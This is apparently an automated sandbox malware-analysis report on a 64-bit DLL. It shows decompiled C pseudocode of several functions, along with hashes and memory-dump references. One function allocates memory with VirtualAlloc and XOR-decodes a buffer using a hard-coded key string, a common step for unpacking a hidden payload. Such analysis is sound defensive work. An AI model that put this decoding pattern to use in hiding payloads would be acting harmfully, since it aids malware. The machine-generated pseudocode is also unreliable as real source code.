                                                                                                        • Associated: 00000000.00000002.279547008.00007FFC12455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.279581563.00007FFC12457000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_7ffc123d0000_loaddll64.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Concurrency::details::$Work$EmptyQueue::Structured$Base::$BridgeContextDispatchIdentityQueueSchedulerThrottlerchar_traitsconstructtype_info::_name_internal_method
                                                                                                        • String ID:
                                                                                                        • API String ID: 3284725307-0
                                                                                                        • Opcode ID: d9377374bb8acdff986d08050f48ac2bf9a2668c8ad2a48d0c73f653525763d1
                                                                                                        • Instruction ID: f2e0b3edca5ea8e3f06b5d061e05a48e41f65a10542be980529cac1652ccb534
                                                                                                        • Opcode Fuzzy Hash: d9377374bb8acdff986d08050f48ac2bf9a2668c8ad2a48d0c73f653525763d1
                                                                                                        • Instruction Fuzzy Hash: 07511D2AA1DF9D85DA70DB51E4513AAA364FBC97A0FC04175EACE83B5ACE7CD410CB10
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Control-flow Graph

                                                                                                        C-Code - Quality: 45%
                                                                                                        			E00007FFC7FFC123D1910(signed char __edx, intOrPtr* __rax, long long __rcx, long long __r8, long long _a8, signed char _a16, long long _a24) {
                                                                                                        				long long _v16;
                                                                                                        				long long _v24;
                                                                                                        				long long _v32;
                                                                                                        				long long _v40;
                                                                                                        				void* _t32;
                                                                                                        				intOrPtr* _t47;
                                                                                                        				long long* _t49;
                                                                                                        
                                                                                                        				_a24 = __r8;
                                                                                                        				_a16 = __edx;
                                                                                                        				_a8 = __rcx;
                                                                                                        				if ((_a16 & 0x000000ff) != 0) goto 0x123d1930;
                                                                                                        				goto 0x123d19f1;
                                                                                                        				E00007FFC7FFC123D2150(__rax, _a8);
                                                                                                        				if ( *((long long*)(__rax)) - 0x10 < 0) goto 0x123d19f1;
                                                                                                        				E00007FFC7FFC123D2190(_a8);
                                                                                                        				_t47 =  *((intOrPtr*)(__rax));
                                                                                                        				_v40 = _t47;
                                                                                                        				E00007FFC7FFC123D2BC0(E00007FFC7FFC123D2190(_a8), _t47);
                                                                                                        				_v32 = _t47;
                                                                                                        				E00007FFC7FFC123D1850(_a8);
                                                                                                        				_t32 = E00007FFC7FFC123D2BD0(_t47, _v32);
                                                                                                        				if (_a24 <= 0) goto 0x123d19bd;
                                                                                                        				E00007FFC7FFC123D2C00(_t32, _v40);
                                                                                                        				_v24 = _t47;
                                                                                                        				E00007FFC7FFC123D2190(_a8);
                                                                                                        				E00007FFC7FFC123D11E0(_t47, _v24, _a24);
                                                                                                        				E00007FFC7FFC123D2150(_t47, _a8);
                                                                                                        				_t49 =  *_t47 + 1;
                                                                                                        				_v16 = _t49;
                                                                                                        				E00007FFC7FFC123D1850(_a8);
                                                                                                        				E00007FFC7FFC123D2100(_t49, _v40, _v16); // executed
                                                                                                        				E00007FFC7FFC123D2150(_t49, _a8);
                                                                                                        				 *_t49 = 0xf;
                                                                                                        				return E00007FFC7FFC123D23A0(_t49, _a8, _a24);
                                                                                                        			}










                                                                                                        0x7ffc123d1910
                                                                                                        0x7ffc123d1915
                                                                                                        0x7ffc123d1919
                                                                                                        0x7ffc123d1929
                                                                                                        0x7ffc123d192b
                                                                                                        0x7ffc123d1935
                                                                                                        0x7ffc123d193e
                                                                                                        0x7ffc123d1949
                                                                                                        0x7ffc123d194e
                                                                                                        0x7ffc123d1951
                                                                                                        0x7ffc123d1963
                                                                                                        0x7ffc123d1968
                                                                                                        0x7ffc123d1972
                                                                                                        0x7ffc123d1982
                                                                                                        0x7ffc123d198d
                                                                                                        0x7ffc123d1994
                                                                                                        0x7ffc123d1999
                                                                                                        0x7ffc123d19a3
                                                                                                        0x7ffc123d19b8
                                                                                                        0x7ffc123d19c2
                                                                                                        0x7ffc123d19ca
                                                                                                        0x7ffc123d19cd
                                                                                                        0x7ffc123d19d7
                                                                                                        0x7ffc123d19ec
                                                                                                        0x7ffc123d19f6
                                                                                                        0x7ffc123d19fb
                                                                                                        0x7ffc123d1a15

                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.279325245.00007FFC123D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFC123D0000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.279243447.00007FFC123D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.279375197.00007FFC12408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.279532482.00007FFC1244E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.279539840.00007FFC12452000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.279547008.00007FFC12455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.279581563.00007FFC12457000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_7ffc123d0000_loaddll64.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Concurrency::details::EmptyQueue::StructuredWork$_aligned_msizechar_traitstype_info::_name_internal_method
                                                                                                        • String ID:
                                                                                                        • API String ID: 2899389904-0
                                                                                                        • Opcode ID: d6a9ae3060159eb32e1333261476f0ce7afd758758ec1d3e09a9f36619dac840
                                                                                                        • Instruction ID: 928ee41ef14e52c545a8780ea4b798472554b11224a021a691b9c5ec491e0c42
                                                                                                        • Opcode Fuzzy Hash: d6a9ae3060159eb32e1333261476f0ce7afd758758ec1d3e09a9f36619dac840
                                                                                                        • Instruction Fuzzy Hash: 2321C16E91CE9A81DA10EB52E4512AEA364FBC47E0FC04075FACE4775ACEBCD451C750
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Control-flow Graph

                                                                                                        C-Code - Quality: 79%
                                                                                                        			E00007FFC7FFC123D13A0(signed int __eax, long long __rcx, signed int __rdx, signed long long __r8, long long _a8, signed int _a16, signed long long _a24) {
                                                                                                        				void* _v16;
                                                                                                        				signed long long _v24;
                                                                                                        				long long _v32;
                                                                                                        				signed int _v40;
                                                                                                        
                                                                                                        				_a24 = __r8;
                                                                                                        				_a16 = __rdx;
                                                                                                        				_a8 = __rcx;
                                                                                                        				if (_a16 - 0xffffffff <= 0) goto 0x123d13cd;
                                                                                                        				E00007FFC7FFC123D9764();
                                                                                                        				_v24 = _a16 * _a24;
                                                                                                        				if (_v24 - 0x1000 < 0) goto 0x123d1475;
                                                                                                        				_v40 = _a8;
                                                                                                        				if ((_v40 & 0x0000001f) == 0) goto 0x123d1409;
                                                                                                        				E00007FFC7FFC123D9764();
                                                                                                        				_v16 = _v40 - 8;
                                                                                                        				_v32 =  *_v16;
                                                                                                        				if (_v32 - _v40 < 0) goto 0x123d1435;
                                                                                                        				E00007FFC7FFC123D9764();
                                                                                                        				if (_v40 - _v32 - 8 >= 0) goto 0x123d1450;
                                                                                                        				E00007FFC7FFC123D9764();
                                                                                                        				if (_v40 - _v32 - 0x27 <= 0) goto 0x123d146b;
                                                                                                        				E00007FFC7FFC123D9764();
                                                                                                        				_a8 = _v32;
                                                                                                        				0x123d4184(); // executed
                                                                                                        				return __eax / _a24;
                                                                                                        			}







                                                                                                        0x7ffc123d13a0
                                                                                                        0x7ffc123d13a5
                                                                                                        0x7ffc123d13aa
                                                                                                        0x7ffc123d13c6
                                                                                                        0x7ffc123d13c8
                                                                                                        0x7ffc123d13d8
                                                                                                        0x7ffc123d13e6
                                                                                                        0x7ffc123d13f1
                                                                                                        0x7ffc123d1402
                                                                                                        0x7ffc123d1404
                                                                                                        0x7ffc123d1412
                                                                                                        0x7ffc123d141f
                                                                                                        0x7ffc123d142e
                                                                                                        0x7ffc123d1430
                                                                                                        0x7ffc123d1449
                                                                                                        0x7ffc123d144b
                                                                                                        0x7ffc123d1464
                                                                                                        0x7ffc123d1466
                                                                                                        0x7ffc123d1470
                                                                                                        0x7ffc123d147a
                                                                                                        0x7ffc123d1483

                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.279325245.00007FFC123D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFC123D0000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.279243447.00007FFC123D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.279375197.00007FFC12408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.279532482.00007FFC1244E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.279539840.00007FFC12452000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.279547008.00007FFC12455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.279581563.00007FFC12457000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_7ffc123d0000_loaddll64.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                        • String ID:
                                                                                                        • API String ID: 3668304517-0
                                                                                                        • Opcode ID: 5b3810bd1dfc2f7cb2c35ba7318fdc2941c7d859428b9d04d3661772caa0df3a
                                                                                                        • Instruction ID: 949f50f39320ec8dfefb73e801cb902641b7baae4f3b2d435ca7511ef7ae919b
                                                                                                        • Opcode Fuzzy Hash: 5b3810bd1dfc2f7cb2c35ba7318fdc2941c7d859428b9d04d3661772caa0df3a
                                                                                                        • Instruction Fuzzy Hash: 4D213E2A618F9C81DA50DB59E08025EA3A9F7C87B4F800635FADD03BA8DF7CD160CB10
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Control-flow Graph

                                                                                                        C-Code - Quality: 45%
                                                                                                        			E00007FFC7FFC123E9510(intOrPtr __edx, long long __rcx, void* __rdx, long long _a8, intOrPtr _a16) {
                                                                                                        				long long _v16;
                                                                                                        				long long _v24;
                                                                                                        				signed int _v28;
                                                                                                        				intOrPtr _v32;
                                                                                                        				signed int _v36;
                                                                                                        				intOrPtr _v40;
                                                                                                        				signed int _t35;
                                                                                                        				signed int _t48;
                                                                                                        				long long _t63;
                                                                                                        				intOrPtr _t64;
                                                                                                        				void* _t66;
                                                                                                        				void* _t76;
                                                                                                        				void* _t77;
                                                                                                        
                                                                                                        				_a16 = __edx;
                                                                                                        				_a8 = __rcx;
                                                                                                        				_v24 = 0;
                                                                                                        				_t63 = "*sd<^MngnRgHP%Nlnz#_&tGXftD&<%Z?YkmM&U?jm?po)5";
                                                                                                        				_v16 = _t63;
                                                                                                        				_v32 = E00007FFC7FFC123D91B8(_t63, _t66, L"64", _t76, _t77);
                                                                                                        				_v36 = E00007FFC7FFC123D91B8(_t63, _t66, L"4096", _t76, _t77);
                                                                                                        				_t35 = E00007FFC7FFC123D91B8(_t63, _t66, L"8192", _t76, _t77);
                                                                                                        				r9d = _v32;
                                                                                                        				r8d = _v36 | _t35;
                                                                                                        				VirtualAlloc(??, ??, ??, ??); // executed
                                                                                                        				_v24 = _t63;
                                                                                                        				if (_v24 != 0) goto 0x123e958f;
                                                                                                        				goto 0x123e95f4;
                                                                                                        				_v40 = 0;
                                                                                                        				goto 0x123e95a3;
                                                                                                        				_v40 = _v40 + 1;
                                                                                                        				if (_v40 - _a16 >= 0) goto 0x123e95ef;
                                                                                                        				_t64 = _v40;
                                                                                                        				_v28 =  *(_a8 + _t64) & 0x000000ff;
                                                                                                        				asm("cdq");
                                                                                                        				_t48 = _v28 ^  *(_v16 + _t64) & 0x000000ff;
                                                                                                        				 *(_v24 + _v40) = _t48;
                                                                                                        				goto 0x123e9599;
                                                                                                        				return _t48;
                                                                                                        			}
















                                                                                                        0x7ffc123e9510
                                                                                                        0x7ffc123e9514
                                                                                                        0x7ffc123e951d
                                                                                                        0x7ffc123e9526
                                                                                                        0x7ffc123e952d
                                                                                                        0x7ffc123e953e
                                                                                                        0x7ffc123e954e
                                                                                                        0x7ffc123e9559
                                                                                                        0x7ffc123e956e
                                                                                                        0x7ffc123e9571
                                                                                                        0x7ffc123e9578
                                                                                                        0x7ffc123e957e
                                                                                                        0x7ffc123e9589
                                                                                                        0x7ffc123e958d
                                                                                                        0x7ffc123e958f
                                                                                                        0x7ffc123e9597
                                                                                                        0x7ffc123e959f
                                                                                                        0x7ffc123e95ab
                                                                                                        0x7ffc123e95ad
                                                                                                        0x7ffc123e95bb
                                                                                                        0x7ffc123e95c3
                                                                                                        0x7ffc123e95de
                                                                                                        0x7ffc123e95ea
                                                                                                        0x7ffc123e95ed
                                                                                                        0x7ffc123e95f8

                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.279325245.00007FFC123D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFC123D0000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.279243447.00007FFC123D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.279375197.00007FFC12408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.279532482.00007FFC1244E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.279539840.00007FFC12452000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.279547008.00007FFC12455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.279581563.00007FFC12457000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_7ffc123d0000_loaddll64.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: AllocVirtual
                                                                                                        • String ID: *sd<^MngnRgHP%Nlnz#_&tGXftD&<%Z?YkmM&U?jm?po)5$4096$8192
                                                                                                        • API String ID: 4275171209-3063897839
                                                                                                        • Opcode ID: 91190bfb5b736a4e483a359375091e0b2d421b3ba45f9d7b7fc30dabc440354d
                                                                                                        • Instruction ID: 272171558c79a68e5d6df2fca63cf0f748b0107e2b5b9a39c9453a83e8570ed9
                                                                                                        • Opcode Fuzzy Hash: 91190bfb5b736a4e483a359375091e0b2d421b3ba45f9d7b7fc30dabc440354d
                                                                                                        • Instruction Fuzzy Hash: 3B213A7661CA958AD760CB14E4802AAB7A1F7C8354F800276F68EC3B94DF7CD555CF14
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Control-flow Graph

                                                                                                        C-Code - Quality: 100%
                                                                                                        			E00007FFC7FFC123D12B0(signed int __eax, signed int __rcx, signed int __rdx, signed int _a8, signed int _a16, signed char _a24) {
                                                                                                        				long long _v16;
                                                                                                        				long long _v24;
                                                                                                        				signed long long _v32;
                                                                                                        				signed long long _v40;
                                                                                                        				void* _t40;
                                                                                                        				long long _t54;
                                                                                                        				signed long long _t57;
                                                                                                        				signed long long _t58;
                                                                                                        				void* _t60;
                                                                                                        
                                                                                                        				_a24 = r8b;
                                                                                                        				_a16 = __rdx;
                                                                                                        				_a8 = __rcx;
                                                                                                        				_v40 = 0;
                                                                                                        				if (_a8 != 0) goto 0x123d12de;
                                                                                                        				goto 0x123d1397;
                                                                                                        				_t42 = __eax % _a16;
                                                                                                        				if (0xffffffff - _a8 >= 0) goto 0x123d12f8;
                                                                                                        				E00007FFC7FFC123D4E7C(__eax % _a16, 0xffffffff - _a8, 0xffffffff, _t60);
                                                                                                        				_v32 = _a8 * _a16;
                                                                                                        				if ((_a24 & 0x000000ff) == 0) goto 0x123d137c;
                                                                                                        				if (_v32 - 0x1000 < 0) goto 0x123d137c;
                                                                                                        				_v24 = _v32 + 0x27;
                                                                                                        				_t54 = _v32;
                                                                                                        				if (_v24 - _t54 > 0) goto 0x123d133b;
                                                                                                        				E00007FFC7FFC123D4E7C(_t42, _v24 - _t54, _t54, _t60);
                                                                                                        				E00007FFC7FFC123D3D6C(_t54, _v24); // executed
                                                                                                        				_v16 = _t54;
                                                                                                        				E00007FFC7FFC123D9764();
                                                                                                        				_t57 = _v16 + 0x00000027 & 0xffffffe0;
                                                                                                        				_v40 = _t57;
                                                                                                        				_t58 = _t57 * 0xffffffff;
                                                                                                        				 *((long long*)(_v40 + _t58)) = _v16;
                                                                                                        				goto 0x123d1392;
                                                                                                        				_t40 = E00007FFC7FFC123D3D6C(_t58, _v32);
                                                                                                        				_v40 = _t58;
                                                                                                        				E00007FFC7FFC123D9764();
                                                                                                        				return _t40;
                                                                                                        			}












                                                                                                        0x7ffc123d12b0
                                                                                                        0x7ffc123d12b5
                                                                                                        0x7ffc123d12ba
                                                                                                        0x7ffc123d12c3
                                                                                                        0x7ffc123d12d2
                                                                                                        0x7ffc123d12d9
                                                                                                        0x7ffc123d12e7
                                                                                                        0x7ffc123d12f1
                                                                                                        0x7ffc123d12f3
                                                                                                        0x7ffc123d1303
                                                                                                        0x7ffc123d130f
                                                                                                        0x7ffc123d131a
                                                                                                        0x7ffc123d1325
                                                                                                        0x7ffc123d132a
                                                                                                        0x7ffc123d1334
                                                                                                        0x7ffc123d1336
                                                                                                        0x7ffc123d1340
                                                                                                        0x7ffc123d1345
                                                                                                        0x7ffc123d134c
                                                                                                        0x7ffc123d135a
                                                                                                        0x7ffc123d135e
                                                                                                        0x7ffc123d1368
                                                                                                        0x7ffc123d1376
                                                                                                        0x7ffc123d137a
                                                                                                        0x7ffc123d1381
                                                                                                        0x7ffc123d1386
                                                                                                        0x7ffc123d138d
                                                                                                        0x7ffc123d139b

                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.279325245.00007FFC123D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFC123D0000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.279243447.00007FFC123D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.279375197.00007FFC12408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.279532482.00007FFC1244E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.279539840.00007FFC12452000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.279547008.00007FFC12455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.279581563.00007FFC12457000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_7ffc123d0000_loaddll64.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Concurrency::cancel_current_task
                                                                                                        • String ID:
                                                                                                        • API String ID: 118556049-0
                                                                                                        • Opcode ID: ff720ffcf4aede3f10a3f13f5346b42280883c8723ff7dc07c368008fd0d958a
                                                                                                        • Instruction ID: 74a20b67814841f727859cb6c298a01d3d2031257462e3da200aa412100d88c0
                                                                                                        • Opcode Fuzzy Hash: ff720ffcf4aede3f10a3f13f5346b42280883c8723ff7dc07c368008fd0d958a
                                                                                                        • Instruction Fuzzy Hash: 7521FF2A51CF9982DB609B19E04036AB7A4FBC87B4F800361F6DD46BE8CF6CD560CB14
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 58%
                                                                                                        			E00007FFC7FFC123D2970(void* __edx, void* __eflags, long long __rcx, long long __rdx, long long __r8, long long _a8, long long _a16, long long _a24) {
                                                                                                        				signed int _v16;
                                                                                                        				char _v48;
                                                                                                        				long long _v56;
                                                                                                        				signed long long _v64;
                                                                                                        				signed int _v72;
                                                                                                        				void* _t35;
                                                                                                        				void* _t37;
                                                                                                        				signed long long _t39;
                                                                                                        				signed long long _t40;
                                                                                                        				signed long long _t61;
                                                                                                        
                                                                                                        				_t37 = __eflags;
                                                                                                        				_t36 = __edx;
                                                                                                        				_a24 = __r8;
                                                                                                        				_a16 = __rdx;
                                                                                                        				_a8 = __rcx;
                                                                                                        				_v56 = 0xfffffffe;
                                                                                                        				_t39 =  *0x1244e008; // 0xbe8d44b92f09
                                                                                                        				_t40 = _t39 ^ _t61;
                                                                                                        				_v16 = _t40;
                                                                                                        				_v72 = 0;
                                                                                                        				E00007FFC7FFC123D1760(__edx,  &_v48);
                                                                                                        				E00007FFC7FFC123D1490(_t40, _a16);
                                                                                                        				_v64 = _t40;
                                                                                                        				E00007FFC7FFC123D11A0(_a24);
                                                                                                        				E00007FFC7FFC123D2CC0(__edx, _t37, _v64 + _t40,  &_v48, _v64 + _t40, __r8); // executed
                                                                                                        				E00007FFC7FFC123D2E90( &_v48, _a16);
                                                                                                        				E00007FFC7FFC123D2E60( &_v48, _a24);
                                                                                                        				E00007FFC7FFC123D16A0(__edx, _v64 + _t40, _a8,  &_v48);
                                                                                                        				_v72 = _v72 | 0x00000001;
                                                                                                        				return E00007FFC7FFC123D3A70(E00007FFC7FFC123D1540( &_v48), _t35, _t36, _v16 ^ _t61);
                                                                                                        			}













                                                                                                        0x7ffc123d2970
                                                                                                        0x7ffc123d2970
                                                                                                        0x7ffc123d2970
                                                                                                        0x7ffc123d2975
                                                                                                        0x7ffc123d297a
                                                                                                        0x7ffc123d2983
                                                                                                        0x7ffc123d298c
                                                                                                        0x7ffc123d2993
                                                                                                        0x7ffc123d2996
                                                                                                        0x7ffc123d299b
                                                                                                        0x7ffc123d29a8
                                                                                                        0x7ffc123d29b3
                                                                                                        0x7ffc123d29b8
                                                                                                        0x7ffc123d29c5
                                                                                                        0x7ffc123d29dd
                                                                                                        0x7ffc123d29ec
                                                                                                        0x7ffc123d29fe
                                                                                                        0x7ffc123d2a0d
                                                                                                        0x7ffc123d2a19
                                                                                                        0x7ffc123d2a3d

                                                                                                        APIs
                                                                                                        • char_traits.LIBCPMTD ref: 00007FFC123D29C5
                                                                                                        • type_info::_name_internal_method.LIBCMTD ref: 00007FFC123D29EC
                                                                                                        • type_info::_name_internal_method.LIBCMTD ref: 00007FFC123D29FE
                                                                                                          • Part of subcall function 00007FFC123D16A0: Concurrency::details::WorkQueue::IsStructuredEmpty.LIBCMTD ref: 00007FFC123D16BC
                                                                                                          • Part of subcall function 00007FFC123D1540: Concurrency::details::WorkQueue::IsStructuredEmpty.LIBCMTD ref: 00007FFC123D1567
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.279325245.00007FFC123D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFC123D0000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.279243447.00007FFC123D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.279375197.00007FFC12408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.279532482.00007FFC1244E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.279539840.00007FFC12452000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.279547008.00007FFC12455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.279581563.00007FFC12457000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_7ffc123d0000_loaddll64.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Concurrency::details::EmptyQueue::StructuredWorktype_info::_name_internal_method$char_traits
                                                                                                        • String ID:
                                                                                                        • API String ID: 652137993-0
                                                                                                        • Opcode ID: ff68c045757dc1b95a1c3926b66d183a1748918898d640881b2e4fd44b880452
                                                                                                        • Instruction ID: e96ff5e436626020c638874bd44ed743403ee6727d2f343cde93ab7ac90d732b
                                                                                                        • Opcode Fuzzy Hash: ff68c045757dc1b95a1c3926b66d183a1748918898d640881b2e4fd44b880452
                                                                                                        • Instruction Fuzzy Hash: A9115E6A61CA8982DA50DB24E4911ABB764FBC47E4FC01231F6CE43AAADF7CD151CF10
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 45%
                                                                                                        			E00007FFC7FFC123D1B40(void* __rax, long long __rcx, long long __rdx, long long __r8, long long _a8, long long _a16, long long _a24) {
                                                                                                        				signed char _t23;
                                                                                                        
                                                                                                        				_a24 = __r8;
                                                                                                        				_a16 = __rdx;
                                                                                                        				_a8 = __rcx;
                                                                                                        				if ((E00007FFC7FFC123D2250(__rax, _a8, _a16) & 0x000000ff) == 0) goto 0x123d1b97;
                                                                                                        				E00007FFC7FFC123D18F0(__rax, _a8);
                                                                                                        				E00007FFC7FFC123D1BF0(_a16 - __rax, _a8, _a8, _a16 - __rax, _a24);
                                                                                                        				goto 0x123d1be0;
                                                                                                        				r8d = 0;
                                                                                                        				_t23 = E00007FFC7FFC123D22B0(_t31, _a8, _a24); // executed
                                                                                                        				if ((_t23 & 0x000000ff) == 0) goto 0x123d1bdb;
                                                                                                        				E00007FFC7FFC123D18F0(_t31, _a8);
                                                                                                        				E00007FFC7FFC123D11E0(_t31, _a16, _a24);
                                                                                                        				return E00007FFC7FFC123D23A0(_t31, _a8, _a24);
                                                                                                        			}




                                                                                                        0x7ffc123d1b40
                                                                                                        0x7ffc123d1b45
                                                                                                        0x7ffc123d1b4a
                                                                                                        0x7ffc123d1b67
                                                                                                        0x7ffc123d1b6e
                                                                                                        0x7ffc123d1b90
                                                                                                        0x7ffc123d1b95
                                                                                                        0x7ffc123d1b97
                                                                                                        0x7ffc123d1ba4
                                                                                                        0x7ffc123d1bae
                                                                                                        0x7ffc123d1bb5
                                                                                                        0x7ffc123d1bc7
                                                                                                        0x7ffc123d1be4

                                                                                                        APIs
                                                                                                          • Part of subcall function 00007FFC123D2250: Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00007FFC123D226B
                                                                                                          • Part of subcall function 00007FFC123D2250: Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00007FFC123D227C
                                                                                                        • Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00007FFC123D1B6E
                                                                                                          • Part of subcall function 00007FFC123D18F0: Concurrency::details::WorkQueue::IsStructuredEmpty.LIBCMTD ref: 00007FFC123D18FE
                                                                                                        • Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00007FFC123D1BB5
                                                                                                        • char_traits.LIBCPMTD ref: 00007FFC123D1BC7
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.279325245.00007FFC123D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFC123D0000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.279243447.00007FFC123D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.279375197.00007FFC12408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.279532482.00007FFC1244E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.279539840.00007FFC12452000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.279547008.00007FFC12455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.279581563.00007FFC12457000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_7ffc123d0000_loaddll64.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Concurrency::details::Work$Base::ContextIdentityQueue$EmptyQueue::Structuredchar_traits
                                                                                                        • String ID:
                                                                                                        • API String ID: 872432861-0
                                                                                                        • Opcode ID: 231cebcbe718267e9fff52c18f272d48930a3c5afa83f06dd49d2f29f991d26b
                                                                                                        • Instruction ID: 622b59f6c55f9b0bee359dd026c7915c4f9324870f03438eea11653154ea61e2
                                                                                                        • Opcode Fuzzy Hash: 231cebcbe718267e9fff52c18f272d48930a3c5afa83f06dd49d2f29f991d26b
                                                                                                        • Instruction Fuzzy Hash: BE111F6A63CE9982DA40DB56E4914AB6364FBC5BD0F801072FECE47B5ACE6CD410CB50
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 65%
                                                                                                        			E00007FFC7FFC123D3F18(void* __ecx) {
                                                                                                        				void* __rbx;
                                                                                                        				void* _t12;
                                                                                                        				void* _t17;
                                                                                                        				void* _t18;
                                                                                                        				void* _t19;
                                                                                                        				void* _t20;
                                                                                                        
                                                                                                        				_t2 =  ==  ? 1 :  *0x1244f1a0 & 0x000000ff;
                                                                                                        				 *0x1244f1a0 =  ==  ? 1 :  *0x1244f1a0 & 0x000000ff;
                                                                                                        				E00007FFC7FFC123D4760(1, _t12, _t17, _t18, _t19, _t20);
                                                                                                        				if (E00007FFC7FFC123D6AC0() != 0) goto 0x123d3f47;
                                                                                                        				goto 0x123d3f5b; // executed
                                                                                                        				E00007FFC7FFC123DA844(_t17); // executed
                                                                                                        				if (0 != 0) goto 0x123d3f59;
                                                                                                        				E00007FFC7FFC123D6B1C(0);
                                                                                                        				goto 0x123d3f43;
                                                                                                        				return 1;
                                                                                                        			}









                                                                                                        0x7ffc123d3f2c
                                                                                                        0x7ffc123d3f2f
